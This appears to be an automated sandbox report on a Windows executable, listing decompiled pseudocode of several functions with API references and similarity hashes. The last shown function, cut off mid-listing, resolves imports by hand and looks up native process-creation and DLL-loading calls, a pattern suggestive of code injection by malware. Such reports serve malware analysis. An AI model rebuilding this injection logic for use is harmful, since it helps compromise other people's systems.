    			E00449BF0(void* __ecx) {
    				void* _t2;
    				DWORD* _t7;
    
    				_t2 =  *0x47bb9c; // 0x2321704
    				if( *((char*)(_t2 + 0xa5)) == 0) {
    					if( *0x47bbb4 == 0) {
    						_t2 = SetWindowsHookExA(3, E00449BAC, 0, GetCurrentThreadId());
    						 *0x47bbb4 = _t2;
    					}
    					if( *0x47bbb0 == 0) {
    						_t2 = CreateEventA(0, 0, 0, 0);
    						 *0x47bbb0 = _t2;
    					}
    					if( *0x47bbb8 == 0) {
    						_t2 = CreateThread(0, 0x3e8, E00449B50, 0, 0, _t7);
    						 *0x47bbb8 = _t2;
    					}
    				}
    				return _t2;
    			}





    APIs
    • GetCurrentThreadId.KERNEL32 ref: 00449C08
    • SetWindowsHookExA.USER32(00000003,00449BAC,00000000,00000000), ref: 00449C18
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00449C33
    • CreateThread.KERNEL32(00000000,000003E8,00449B50,00000000,00000000), ref: 00449C57
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CreateThread$CurrentEventHookWindows
    • String ID:
    • API String ID: 1195359707-0
    • Opcode ID: 9893fee68683f0ccf2c602fb5176bdd3d3002154e8c533b20315aa4d11584b9f
    • Instruction ID: 3afaaa722443c625be132c828b029b193969c113832c3a868a9e92f2de38a3c6
    • Opcode Fuzzy Hash: 9893fee68683f0ccf2c602fb5176bdd3d3002154e8c533b20315aa4d11584b9f
    • Instruction Fuzzy Hash: 1DF0FE70B88344AEF760BB60AC8AF273698E314B16F1000BEF609795D5C7B92DD0975D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406B14(void* __eax, int __ecx, long __edx) {
    				void* _t2;
    				void* _t4;
    
    				_t2 = GlobalHandle(__eax);
    				GlobalUnWire(_t2);
    				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
    				GlobalFix(_t4);
    				return _t4;
    			}





    APIs
    • GlobalHandle.KERNEL32 ref: 00406B17
    • GlobalUnWire.KERNEL32(00000000), ref: 00406B1E
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406B23
    • GlobalFix.KERNEL32(00000000), ref: 00406B29
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Global$AllocHandleWire
    • String ID:
    • API String ID: 2210401237-0
    • Opcode ID: dd0af09868c75cb0275c6e7709d4b38ad3534b4c99d0890db1c8dd30b2df49b7
    • Instruction ID: 23714a7e4814d893240f0fea2ed11334475c3c26e64ac68e2a7c1bb564b1283a
    • Opcode Fuzzy Hash: dd0af09868c75cb0275c6e7709d4b38ad3534b4c99d0890db1c8dd30b2df49b7
    • Instruction Fuzzy Hash: BFB004D481030168E9047BB24C0AD7B04AC9984648393696E3C0AB688398BEA82118BA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E0042A2A8(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				struct tagPOINT _v20;
    				intOrPtr _v24;
    				char _v28;
    				char _v36;
    				void* __edi;
    				void* __ebp;
    				intOrPtr _t54;
    				intOrPtr _t60;
    				intOrPtr _t65;
    				intOrPtr _t71;
    				intOrPtr _t74;
    				void* _t88;
    				intOrPtr _t105;
    				intOrPtr _t115;
    				intOrPtr _t116;
    				intOrPtr _t120;
    				intOrPtr _t123;
    				intOrPtr _t124;
    				intOrPtr _t129;
    				void* _t133;
    				intOrPtr _t134;
    				void* _t137;
    
    				_t137 = __fp0;
    				_v8 = __ecx;
    				_t88 = __edx;
    				_t124 = __eax;
    				 *0x47bb18 = __eax;
    				_push(_t133);
    				_push(0x42a44d);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t134;
    				_v12 = 0;
    				 *0x47bb20 = 0;
    				_t135 =  *((char*)(__eax + 0x9b));
    				if( *((char*)(__eax + 0x9b)) != 0) {
    					E00403674(__eax, __eflags);
    					__eflags =  *0x47bb18;
    					if( *0x47bb18 != 0) {
    						__eflags = _v12;
    						if(_v12 == 0) {
    							_v12 = E0042966C(1, _t124);
    							 *0x47bb20 = 1;
    						}
    						_t128 =  *((intOrPtr*)(_v12 + 0x38));
    						_t105 =  *0x428474; // 0x4284c0
    						_t54 = E00403604( *((intOrPtr*)(_v12 + 0x38)), _t105);
    						__eflags = _t54;
    						if(_t54 == 0) {
    							_t129 =  *((intOrPtr*)(_v12 + 0x38));
    							__eflags =  *((intOrPtr*)(_t129 + 0x30));
    							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
    								L14:
    								__eflags = 0;
    								E00412A0C(0,  &_v36, 0);
    								E0042BA70(_t129,  &_v28,  &_v36);
    								_t60 = _v12;
    								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
    								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
    								L15:
    								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
    								E00412A0C( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)));
    								_t65 = _v12;
    								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
    								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
    								goto L16;
    							}
    							_t116 =  *0x428474; // 0x4284c0
    							_t71 = E00403604(_t129, _t116);
    							__eflags = _t71;
    							if(_t71 != 0) {
    								goto L14;
    							}
    							GetCursorPos( &_v20);
    							_t74 = _v12;
    							 *(_t74 + 0x44) = _v20.x;
    							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
    							goto L15;
    						} else {
    							GetWindowRect(E0043260C(_t128), _v12 + 0x44);
    							L16:
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							L17:
    							E0042A138(_v12, _v8, _t88, _t133, _t137);
    							_pop(_t115);
    							 *[fs:eax] = _t115;
    							return 0;
    						}
    					}
    					_pop(_t120);
    					 *[fs:eax] = _t120;
    					return 0;
    				}
    				E00403674(__eax, _t135);
    				if( *0x47bb18 != 0) {
    					__eflags = _v12;
    					if(_v12 == 0) {
    						_v12 = E00429554(_t124, 1);
    						 *0x47bb20 = 1;
    					}
    					goto L17;
    				}
    				_pop(_t123);
    				 *[fs:eax] = _t123;
    				return 0;
    			}



























    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID:
    • String ID: dsB
    • API String ID: 0-744468583
    • Opcode ID: 6fb7f05c8a38dd1a6429b328a0413db970e6a339a96b5d170f31d2b4e5a021db
    • Instruction ID: fd3f7e190ca731340d96629e88ff5f33280288a9cd23e29a295a5fe674fe5551
    • Opcode Fuzzy Hash: 6fb7f05c8a38dd1a6429b328a0413db970e6a339a96b5d170f31d2b4e5a021db
    • Instruction Fuzzy Hash: 49519230B042199FCB10DF59E881A9EBBF5FF88318F5080AADC04A7355D775AD95CB89
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0043EDF8(intOrPtr __eax, void* __edx) {
    				char _v8;
    				signed short _v10;
    				intOrPtr _v16;
    				char _v17;
    				char _v24;
    				intOrPtr _t34;
    				intOrPtr _t40;
    				intOrPtr _t42;
    				intOrPtr _t48;
    				void* _t51;
    				intOrPtr _t64;
    				intOrPtr _t67;
    				void* _t69;
    				void* _t71;
    				intOrPtr _t72;
    
    				_t69 = _t71;
    				_t72 = _t71 + 0xffffffec;
    				_t51 = __edx;
    				_v16 = __eax;
    				_v10 =  *((intOrPtr*)(__edx + 4));
    				if(_v10 == 0) {
    					return 0;
    				} else {
    					if(GetKeyState(0x10) < 0) {
    						_v10 = _v10 + 0x2000;
    					}
    					if(GetKeyState(0x11) < 0) {
    						_v10 = _v10 + 0x4000;
    					}
    					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
    						_v10 = _v10 + 0x8000;
    					}
    					_v24 =  *((intOrPtr*)(_v16 + 0x34));
    					_t34 =  *0x47bb90; // 0x2321244
    					E004222E0(_t34,  &_v24);
    					_push(_t69);
    					_push(0x43eef6);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t72;
    					while(1) {
    						_v17 = 0;
    						_v8 = E0043EAFC(_v16, 2, _v10 & 0x0000ffff);
    						if(_v8 != 0) {
    							break;
    						}
    						if(_v24 == 0 || _v17 != 2) {
    							_pop(_t64);
    							 *[fs:eax] = _t64;
    							_push(0x43eefd);
    							_t40 =  *0x47bb90; // 0x2321244
    							return E004222D8(_t40);
    						} else {
    							continue;
    						}
    						goto L14;
    					}
    					_t42 =  *0x47bb90; // 0x2321244
    					E004222E0(_t42,  &_v8);
    					_push(_t69);
    					_push(0x43eecb);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t72;
    					_v17 = E0043ECA4( &_v8, 0, _t69);
    					_pop(_t67);
    					 *[fs:eax] = _t67;
    					_push(0x43eed2);
    					_t48 =  *0x47bb90; // 0x2321244
    					return E004222D8(_t48);
    				}
    				L14:
    			}



















    APIs
    • GetKeyState.USER32(00000010), ref: 0043EE1C
    • GetKeyState.USER32(00000011), ref: 0043EE2E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: State
    • String ID:
    • API String ID: 1649606143-3916222277
    • Opcode ID: 137f6c696247634acfa8957aa13ae892b5512e102e2887b83135f1f3b7d29743
    • Instruction ID: 9f16bcd781f87d17f98c35eaef72bfd8b08fe011bc7bd621bc985375d868424a
    • Opcode Fuzzy Hash: 137f6c696247634acfa8957aa13ae892b5512e102e2887b83135f1f3b7d29743
    • Instruction Fuzzy Hash: 16310634A05208EFDB11DFA6D91279EB7F5EB4C304F9194BAEC04A76D2E7785E00C668
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E0042669C(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				void* _t33;
    				long _t46;
    				CHAR* _t48;
    				void* _t55;
    				intOrPtr _t67;
    				void* _t74;
    				char _t76;
    				void* _t79;
    
    				_t74 = __edi;
    				_t78 = _t79;
    				_push(__ebx);
    				_push(__esi);
    				_v32 = 0;
    				_v8 = 0;
    				_v12 = 0;
    				_t76 = __edx;
    				_t55 = __eax;
    				_push(_t79);
    				_push(0x426794);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t79 + 0xffffffe4;
    				_t81 = __edx;
    				if(__edx == 0) {
    					E0040B6D8(0x42623c, 1);
    					E00403BF4();
    				}
    				_v28 = _t76;
    				_v24 = 0xb;
    				E004263E8(_t55, _t55,  &_v32, 0, _t74, _t76);
    				_v20 = _v32;
    				_v16 = 0xb;
    				E00408D4C("IE(AL(\"%s\",4),\"AL(\\\"%0:s\\\",3)\",\"JK(\\\"%1:s\\\",\\\"%0:s\\\")\")", 1,  &_v28,  &_v8);
    				_t33 = E00426D2C(_t55, _t74, _t78, _t81);
    				_t82 = _t33;
    				if(_t33 != 0) {
    					E004263E8(_t55, _t55,  &_v12, 0, _t74, _t76);
    					if(E00426C84(_t55, _t55, _v8, 1, _t76, _t82, 0) != 0 && _v12 != 0) {
    						 *((char*)(_t55 + 0x10)) = 1;
    						E00404234(_t55 + 0x14, _v8);
    						_t46 = E004046A0(_v8);
    						_t48 = E004046A0(_v12);
    						WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x1c)))) + 0xc))(), _t48, 0x102, _t46);
    					}
    				}
    				_pop(_t67);
    				 *[fs:eax] = _t67;
    				_push(0x42679b);
    				E004041E0( &_v32);
    				return E00404204( &_v12, 2);
    			}



















    APIs
    • WinHelpA.USER32(00000000), ref: 0042676C
    Strings
    • D-B, xrefs: 004266CC
    • IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")"), xrefs: 00426704
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Help
    • String ID: D-B$IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
    • API String ID: 2830496658-2816275659
    • Opcode ID: 0f49b4322bb3220dd9894c9258f2b34ae4e3e11a84cd114224d755eadfeb2466
    • Instruction ID: 81b62ded76a7deaaaeea822c435f77c610379b76ef7abb8dd24a3da2bca9e890
    • Opcode Fuzzy Hash: 0f49b4322bb3220dd9894c9258f2b34ae4e3e11a84cd114224d755eadfeb2466
    • Instruction Fuzzy Hash: 3F317574B002189BDB04EF65E88169EB7B49F48308F9144BAF801A7382DB7D9E05CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E00409BFC(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    				char _v8;
    				short _v18;
    				short _v22;
    				struct _SYSTEMTIME _v24;
    				char _v280;
    				char* _t32;
    				intOrPtr* _t49;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    
    				_v8 = 0;
    				_t49 = __edx;
    				_t63 = __eax;
    				_push(_t67);
    				_push(0x409cda);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t67 + 0xfffffeec;
    				E004041E0(__edx);
    				_v24 =  *((intOrPtr*)(_a4 - 0xe));
    				_v22 =  *((intOrPtr*)(_a4 - 0x10));
    				_v18 =  *((intOrPtr*)(_a4 - 0x12));
    				if(_t63 > 2) {
    					E00404278( &_v8, 0x409cfc);
    				} else {
    					E00404278( &_v8, 0x409cf0);
    				}
    				_t32 = E004046A0(_v8);
    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
    					E00404450(_t49, 0x100,  &_v280);
    					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
    						E00404700( *_t49, E004044A0( *_t49) - 1, 2, _t49);
    					}
    				}
    				_pop(_t58);
    				 *[fs:eax] = _t58;
    				_push(E00409CE1);
    				return E004041E0( &_v8);
    			}














    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00409CDA), ref: 00409C82
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00409CDA), ref: 00409C88
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: DateFormatLocaleThread
    • String ID: yyyy
    • API String ID: 3303714858-3145165042
    • Opcode ID: 0ad7180b5e61c09a262b7f13a32aae868c43ed68dbb425217af6daec0209aa93
    • Instruction ID: 0a9a17e66bc868be51a415f8514c2a7eb316ebfaa63ce7add6bff58da6a54ffd
    • Opcode Fuzzy Hash: 0ad7180b5e61c09a262b7f13a32aae868c43ed68dbb425217af6daec0209aa93
    • Instruction Fuzzy Hash: 4B217478A042089BDB00EF65C992AAE77E8EF48704F5144BBF905F73D2D6789E40C769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E004207C8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _t62;
    				intOrPtr _t64;
    				intOrPtr _t67;
    				void* _t77;
    				void* _t78;
    				intOrPtr _t79;
    				intOrPtr _t80;
    
    				_t77 = _t78;
    				_t79 = _t78 + 0xfffffff8;
    				_v8 = __eax;
    				_v12 = E0040343C(1);
    				_push(_t77);
    				_push(0x42084f);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t79;
    				 *((intOrPtr*)(_v12 + 8)) = __edx;
    				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
    				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
    				_t80 = _t79 + 0xc;
    				 *((char*)(_v12 + 0x70)) = _a8;
    				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
    					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
    				}
    				_t62 =  *0x41220c; // 0x412258
    				 *((intOrPtr*)(_v12 + 0x6c)) = E00403628(_a4, _t62);
    				_pop(_t64);
    				 *[fs:eax] = _t64;
    				_push(0x47b8c4);
    				L0040628C();
    				_push(_t77);
    				_push(0x4208af);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t80;
    				E0041F334( *((intOrPtr*)(_v8 + 0x28)));
    				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
    				E0041F330(_v12);
    				_pop(_t67);
    				 *[fs:eax] = _t67;
    				_push(0x4208b6);
    				_push(0x47b8c4);
    				L004063B4();
    				return 0;
    			}













    APIs
    • RtlEnterCriticalSection.NTDLL(0047B8C4), ref: 0042086B
    • RtlLeaveCriticalSection.NTDLL(0047B8C4), ref: 004208A9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave
    • String ID: X"A
    • API String ID: 3168844106-998740284
    • Opcode ID: 253a5e7cfa9bd28033097d92a4b28887585d928b86f222e65915daaf4546925d
    • Instruction ID: e3c3f36d82982d4dc2145e2a7e6e4238d5da50ea5897386ba35e1dfaf6e2df1b
    • Opcode Fuzzy Hash: 253a5e7cfa9bd28033097d92a4b28887585d928b86f222e65915daaf4546925d
    • Instruction Fuzzy Hash: DA217F74A04304AFC701EF69D88198EBBF5FF48720B5281BAE804A7352C774AD81CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0042C2D8(void* __eflags, intOrPtr _a4) {
    				char _v5;
    				struct tagRECT _v21;
    				struct tagRECT _v40;
    				void* _t40;
    				void* _t45;
    
    				_v5 = 1;
    				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
    				_t45 = E00413EC4( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
    				if(_t45 <= 0) {
    					L5:
    					_v5 = 0;
    				} else {
    					do {
    						_t45 = _t45 - 1;
    						_t40 = E00413E68(_t44, _t45);
    						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
    							goto L4;
    						} else {
    							E0042B8F8(_t40,  &_v40);
    							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
    							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
    								goto L4;
    							}
    						}
    						goto L6;
    						L4:
    					} while (_t45 > 0);
    					goto L5;
    				}
    				L6:
    				return _v5;
    			}









    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Rect$EqualIntersect
    • String ID: @
    • API String ID: 3291753422-2766056989
    • Opcode ID: 8e4db0e75e6584b9dc2388094bee1c1f11cf8faa7336afb6c4c5463d8596711e
    • Instruction ID: bca7c5cf07cbe38fc2b05b59d1374a630d25d2c9a517fbf54e06570ee55165ec
    • Opcode Fuzzy Hash: 8e4db0e75e6584b9dc2388094bee1c1f11cf8faa7336afb6c4c5463d8596711e
    • Instruction Fuzzy Hash: 20119E32A042585BCB01DA6DC884BDEBBE89F49398F484692FC04EB382D779ED0587D4
    Uniqueness

    Uniqueness Score: -1.00%

    Executed Functions

    C-Code - Quality: 87%
    			E0041C5F3(signed char __ecx, void* __edx) {
    				char _v487;
    				char _v764;
    				char _v772;
    				char _v784;
    				intOrPtr _v792;
    				intOrPtr _v796;
    				signed char _v800;
    				intOrPtr _v804;
    				signed char _v808;
    				struct HINSTANCE__* _v812;
    				intOrPtr _v816;
    				void* __edi;
    				void* __esi;
    				signed int _t43;
    				struct HINSTANCE__* _t46;
    				struct HINSTANCE__* _t50;
    				_Unknown_base(*)()* _t56;
    				void* _t57;
    				signed int _t60;
    				void** _t61;
    				signed int _t65;
    				signed int _t67;
    				signed int _t68;
    				signed int _t70;
    				void* _t76;
    				intOrPtr _t80;
    				signed int _t81;
    				signed int _t82;
    				signed int _t83;
    				struct HINSTANCE__* _t84;
    				int _t86;
    				signed int _t89;
    				void* _t92;
    				signed int* _t94;
    				WCHAR* _t98;
    				void* _t99;
    				signed int* _t101;
    
    				_t92 = __edx;
    				_t90 = __ecx;
    				_v808 = __ecx;
    				_t86 = 0;
    				_t2 =  &_v808;
    				 *_t2 = _v808 & 0x00000001;
    				_v800 = __ecx;
    				if( *_t2 == 0) {
    					 *0x423b60 = 0;
    				}
    				_t94 = E0041C2AE();
    				 *0x423b78 = _t94;
    				if(_t94 == _t86) {
    					L26:
    					_t43 = 0;
    				} else {
    					if(_v808 != _t86) {
    						_v796 = E0041C1E8(_t90, _t92, _t94, "GetProcAddress");
    						_v804 = E0041C1E8(_t90, _t92, _t94, "LoadLibraryA");
    						_t46 =  *0x423b74;
    						_v812 = _t46;
    						_t90 =  *((intOrPtr*)(_t46 + 0x3c)) + _t46 + 0x80;
    						__eflags = _v804 - _t86;
    						if(_v804 == _t86) {
    							goto L20;
    						} else {
    							__eflags = _v792 - _t86;
    							if(_v792 == _t86) {
    								goto L20;
    							} else {
    								_t94 =  *_t90;
    								__eflags = _t94 - _t86;
    								if(_t94 <= _t86) {
    									goto L20;
    								} else {
    									__eflags =  *((intOrPtr*)(_t90 + 4)) - 0x14;
    									if( *((intOrPtr*)(_t90 + 4)) <= 0x14) {
    										goto L20;
    									} else {
    										_t94 = _t94 + _t46;
    										__eflags =  *_t94 - _t86;
    										if( *_t94 == _t86) {
    											goto L20;
    										} else {
    											while(1) {
    												_t80 = _v796(_t94[3] + _v804);
    												_v792 = _t80;
    												__eflags = _t80 - _t86;
    												if(_t80 == _t86) {
    													goto L26;
    												}
    												_t101 =  *_t94 + _v808;
    												_t89 = _t94[4] + _v808;
    												while(1) {
    													_t81 =  *_t101;
    													__eflags = _t81;
    													if(__eflags == 0) {
    														break;
    													}
    													if(__eflags >= 0) {
    														_t90 = _v808;
    														_t82 = _t81 + _v808 + 2;
    													} else {
    														_t82 = _t81 & 0x0000ffff;
    													}
    													_t83 = _v796(_v792, _t82);
    													__eflags = _t83;
    													if(_t83 == 0) {
    														goto L26;
    													} else {
    														 *_t89 = _t83;
    														_t101 =  &(_t101[1]);
    														_t89 = _t89 + 4;
    														__eflags = _t89;
    														continue;
    													}
    													goto L46;
    												}
    												_t94 =  &(_t94[5]);
    												_t86 = 0;
    												__eflags =  *_t94;
    												if( *_t94 != 0) {
    													continue;
    												} else {
    													goto L20;
    												}
    												goto L46;
    											}
    											goto L26;
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t84 = GetModuleHandleW(_t86);
    						 *0x423b74 = _t84;
    						if(_t84 == _t86) {
    							goto L26;
    						} else {
    							L20:
    							_t98 =  &_v784;
    							E00419897(0xe5, _t98);
    							_t50 = GetModuleHandleW(_t98);
    							 *0x423b7c = _t50;
    							if(_t50 == _t86) {
    								goto L26;
    							} else {
    								_t99 = GetProcAddress;
    								 *0x423b80 = GetProcAddress(_t50, "NtCreateThread");
    								 *0x423b84 = GetProcAddress( *0x423b7c, "NtCreateUserProcess");
    								 *0x423b88 = GetProcAddress( *0x423b7c, "NtQueryInformationProcess");
    								 *0x423b8c = GetProcAddress( *0x423b7c, "RtlUserThreadStart");
    								 *0x423b90 = GetProcAddress( *0x423b7c, "LdrLoadDll");
    								_t56 = GetProcAddress( *0x423b7c, "LdrGetDllHandle");
    								 *0x423b94 = _t56;
    								if( *0x423b80 != _t86 ||  *0x423b84 != _t86) {
    									if( *0x423b88 == _t86 ||  *0x423b90 == _t86 || _t56 == _t86) {
    										goto L26;
    									} else {
    										_t57 = HeapCreate(_t86, 0x80000, _t86); // executed
    										 *0x423a1c = _t57;
    										__eflags = _t57 - _t86;
    										if(_t57 != _t86) {
    											 *0x422833 = 1;
    										} else {
    											 *0x423a1c = GetProcessHeap();
    											 *0x422833 = 0;
    										}
    										 *0x423050 = _t86;
    										 *0x422832 = 0;
    										InitializeCriticalSection(0x422b2c);
    										 *0x422b44 = _t86; // executed
    										__imp__#115(0x202,  &_v764); // executed
    										_t60 = E0041C2E8(_v808, _t90, _t94, _t99);
    										__eflags = _t60;
    										if(_t60 == 0) {
    											goto L26;
    										} else {
    											__eflags = _v816 - _t86;
    											if(_v816 != _t86) {
    												L33:
    												_t61 = E00413315(_t90, 0xffffffff, 0x423b70);
    												 *0x423b64 = _t61;
    												__eflags = _t61 - _t86;
    												if(_t61 == _t86) {
    													goto L26;
    												} else {
    													 *0x423b68 = GetLengthSid( *_t61);
    													 *0x423b6c = E004130AD( *( *0x423b64), _t62);
    													_t65 = E0041C367(_t64, _v816);
    													__eflags = _t65;
    													if(_t65 == 0) {
    														goto L26;
    													} else {
    														 *0x423dd0 = GetCurrentProcessId();
    														 *0x423dd4 = _t86;
    														__eflags = _v816 - _t86;
    														if(_v816 != _t86) {
    															_t67 = 1;
    														} else {
    															_t67 = E0041C3C9();
    														}
    														__eflags = _t67;
    														if(_t67 == 0) {
    															goto L26;
    														} else {
    															__eflags = _v816 - _t86;
    															if(_v816 == _t86) {
    																E0041CCD2( &_v772);
    																_t90 = 0x423fce;
    																E0041635B(0x423fce, 0x423dd8,  *0x423b6c,  &_v487, _t86);
    															}
    															_t68 = E0041C41B(_v808);
    															__eflags = _t68;
    															if(_t68 == 0) {
    																goto L26;
    															} else {
    																__eflags = _v808 & 0x00000002;
    																 *0x423a2c = _t86;
    																 *0x4223a8 = 0;
    																 *0x4228b0 = 0;
    																 *0x422bc8 = 0;
    																 *0x422b60 = 0;
    																 *0x422848 = 0;
    																 *0x4227d0 = 0;
    																if(__eflags == 0) {
    																	_t70 = 1;
    																} else {
    																	_t70 = E0041C4D2(_t90, _t92, __eflags);
    																}
    																__eflags = _t70;
    																_t41 = _t70 != 0;
    																__eflags = _t41;
    																_t43 = _t70 & 0xffffff00 | _t41;
    															}
    														}
    													}
    												}
    											} else {
